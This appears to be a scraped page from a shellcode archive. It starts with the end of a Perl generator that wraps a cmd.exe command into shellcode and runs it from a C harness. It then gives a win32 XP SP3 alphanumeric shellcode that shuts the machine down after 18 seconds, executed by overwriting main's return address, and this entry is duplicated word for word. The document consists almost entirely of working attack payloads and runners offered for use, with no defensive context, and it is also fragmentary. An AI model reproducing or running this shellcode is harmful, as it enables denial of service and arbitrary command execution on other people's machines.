"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".

"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';

my $end = q'



    printf("Size = %d bytes\n", strlen(shellcode));

 

    ((void (*)())shellcode)();

 

    return 0;

}

';



print $header.$sh.$end;

Alphanumeric Shutdown 18s

/*



# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes



# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com



# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]



# Tested on : Windows XP sp3 Fr



*/





#include <stdio.h>





char shell[]=

"\x89\xE3" // MOV EBX,ESP



"\xDB\xC2" // FCMOVNB ST,ST(2)



"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C]



"\x5E" // POP ESI



// Start Alphanumeric Payload



"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"



"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"



"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"



"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"



"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";



// End Payload

int 



main(int argc, char **argv) {

   int *ret;

 

   ret = (int *)&ret + 2;

  (*ret) = (int) shell;

}

Alphanumeric Shutdown 18s

/*



# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes



# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com



# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]



# Tested on : Windows XP sp3 Fr



*/





#include <stdio.h>





char shell[]=

"\x89\xE3" // MOV EBX,ESP



"\xDB\xC2" // FCMOVNB ST,ST(2)



"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C]



"\x5E" // POP ESI



// Start Alphanumeric Payload



"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"



"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"



"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"



"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"



"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";



// End Payload

int 



main(int argc, char **argv) {

   int *ret;

 

   ret = (int *)&ret + 2;

  (*ret) = (int) shell;

}